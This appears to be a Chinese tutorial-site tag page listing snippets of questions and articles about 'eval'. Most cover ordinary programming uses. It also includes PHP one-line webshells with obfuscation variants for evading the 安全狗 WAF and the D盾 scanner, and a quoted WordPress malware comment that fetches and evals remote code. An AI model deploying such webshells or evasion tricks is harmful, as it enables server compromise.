eval | 易学教程

Python saving an eval function

阅读更多关于 Python saving an eval function

问题 Say I have a function fun(f, x, y) where x and y are numbers and f is a string specifying a function such as "1 / x ** 2 + y" . I wish to use this function f a lot, say a few million times, and the values of x and y change between each use. Therefore calling eval(f) takes a significant amount of time as opposed to just calculating the value of the function each time. (About 50x, in my measured case.) Is there any way to save this function f so that I would only have to call eval once? PS.

Eval Base64 virus Wordpress [duplicate]

阅读更多关于 Eval Base64 virus Wordpress [duplicate]

问题 This question already has answers here : How to get rid of eval-base64_decode like PHP virus files? (7 answers) Closed 3 years ago . I'm using a wordpress blog today i got a comment like this .  eval(base64_decode("JGRhdGEgPSBmaWxlX2dldF9jb250ZW50cygiaHR0cHM6Ly9zMy5hbWF6b25hd3MuY29tL3dvcmRwcmVzcy1jb3JlL3VwZGF0ZS1mcmFtZXdvcmsudHh0Iik7ZXZhbCgkZGF0YSk7")); --> When i've decoded this comment using decoder i got $data = file_get_contents("https://s3

eval() with variables from an object in the scope

阅读更多关于 eval() with variables from an object in the scope

问题 how can I execute a string as code (using eval() ) and give it some variables? For example, I've got an object named vars and want each of its properties to be accessible for the code without exciplitely specifying the objects name. Something like this: function evalWithVariables(func, vars) { //some magic here return eval(func); } function test() { var retval = evalWithVariables("a>5", {"a":7}); console.log(retval); } Oh, and the code is trusted, it comes from the same server as the script,

绕过WAF-一句话木马

阅读更多关于绕过WAF-一句话木马

注:本次的测试环境是最新的安全狗Apache:V4.0 一句话木马:<?php eval($_REQUEST['a'])?> 1.但是这样写容易被安全狗这些拦截,所以可以考虑替换某些函数,比如eval换成assert()或者reate_function()或者是call_user_func() 2.使用end()函数来代替,可以写成: <?php eval(end($_REQUEST)); ?> 注:密码是随便写,在安全狗上是查不出来的,但是D盾会查出一个最低价的危险,所以,如果要让D盾完全测不出来可以这样写： <?php if($_SERVER['HTTP_USER_AGENT'] === '1'{ eval(end($_REQUEST));} ?> 3.字符拼接加双美元符 <?php $a='ass'; $b='ert'; $funcName=$a.$b //assert $x='funcName'; $$x($_REQUEST['a']); ?> 4.常量 <?php defin("a","$_REQUEST['a']");eval(a); ?> 5.用函数强行分割 <?php function a($a){ return $a;} eval (a($_REQUEST)['hh']); ?> 6.用类分割 <?php class User {public $name=' ';

Accessing Global Vars with Window

阅读更多关于 Accessing Global Vars with Window

问题 Why doesn't window.x print out 10 ? eval("var x = 10;"); console.log(window.x); // undefined console.log(x); // 10 http://jsfiddle.net/kzd4z/1/ 回答1: You have selected onLoad in the side panel, which wraps everything in an anonymous function. If you pick "No wrap" it works. Demo: http://jsfiddle.net/kzd4z/2/ You can see this by viewing source: //<![CDATA[ window.onload=function(){ eval("var x = 10;"); console.log(window.x); // undefined console.log(x); // 10 }//]]> 回答2: Expanding on @Dennis'

Using an environment variable to pass arguments to a command

阅读更多关于 Using an environment variable to pass arguments to a command

问题 I'm trying to write a bash script that takes an environment variable and passes it along to a command. So if I had something like: export OUT="-a=arg1 -b=\"arg2.0 arg2.1\"" I want in my bash script to do something like: <command> -a=arg1 '-b=arg2.0 arg2.1' I have one approach that seems to do this, but it involves using eval: eval <command> ${OUT} If I include set -x right about the command, I will see: + eval <command> a=arg1 'b="arg2.0' 'arg2.1"' ++ <command> -a=arg1 '-b=arg2.0 arg.1'

PHP7.1后webshell免杀

阅读更多关于 PHP7.1后webshell免杀

严格的D盾 D盾说，我是个严格的人，看到eval我就报木马，“看着像“=”就是“木马，宁可错杀一千，绝不放过一个。好了，多说无益，一起看看严格的D盾是如何错杀的。我随手写一个php文件：代码如下： <?php function encode($para0){ return $para0; } $b = encode("aaaa"); $a = "ccc"; eval($a); ?> 很明显没有传参呀，GET和POST都没有，压根儿就不是木马的，但是D盾竟然给我直接报了已知后门，我哭辽，如下：大家最初的绕过应该大多都是基于”assert”的拆分和隐藏绕过的，但是在php7.1后assert已经被移除了，那么我们这些渗透测试er该何去何从呢？，能否找到新的技巧呢？当然，技巧千千万，找一些少见的函数，少见的特殊字符都是不错的选择。但是我们能否借助在php7.1之前的隐藏和拆分”assert“的思路呢？答案是肯定的，我们可以尝试隐藏和拆分传入eval中的参数来直面eval函数绕过。隐藏POST和GET 在php7.1之后，如果我们转换思路，不再纠结于隐藏assert，eval等命令执行函数(因为assert已经失效，也无法隐藏了，无需隐藏了)，而是直接面对eval，在我上述的例子中大家很容易看到，我就随便往eval中传了一个参数“ccc”，D盾就直接报已知后门了

Pythonic way to eval all octal values in a string as integers

阅读更多关于 Pythonic way to eval all octal values in a string as integers

问题 So I've got a string that looks like "012 + 2 - 01 + 24" for example. I want to be able to quickly (less code) evaluate that expression... I could use eval() on the string, but I don't want 012 to be represented in octal form (10), I want it to be represented as an int (12). My solution for this works, but it is not elegant. I am sort of assuming that there is a really good pythonic way to do this. My solution: #expression is some string that looks like "012 + 2 - 01 + 24" atomlist = [] for

Is this a Chrome bug or is my use of “use strict” and eval invalid?

阅读更多关于 Is this a Chrome bug or is my use of “use strict” and eval invalid?

问题 This code works alerts "ok" in all browsers except Chrome: eval("var outer = 0; function test() {'use strict'; outer = 1; } test(); alert('ok');"); (Try it on jsfiddle ). All I'm doing is referencing an outer variable from a 'use strict' function, all in eval context. Chrome says Uncaught ReferenceError: outer is not defined Note: I originally faced it when using devtool: 'eval' in Webpack. 回答1: To simplify the problem : http://jsfiddle.net/rokkkjcs/6/ eval("var outer=0;"); function test() {

Writing `eval()` in C

阅读更多关于 Writing `eval()` in C

问题 I've been trying to make an eval function in C for a while. At the moment, my idea is to make a hash String -> function pointer with all the standard library C functions, and all the functions that I make, that way I could handle function invocations (on already defined functions). However, defining functions with strings (i.e, calling eval("int fun(){return 1;}") ) is still a problem, I don't know how I could handle this on runtime, does anyone have any idea? Variable definitions don't seem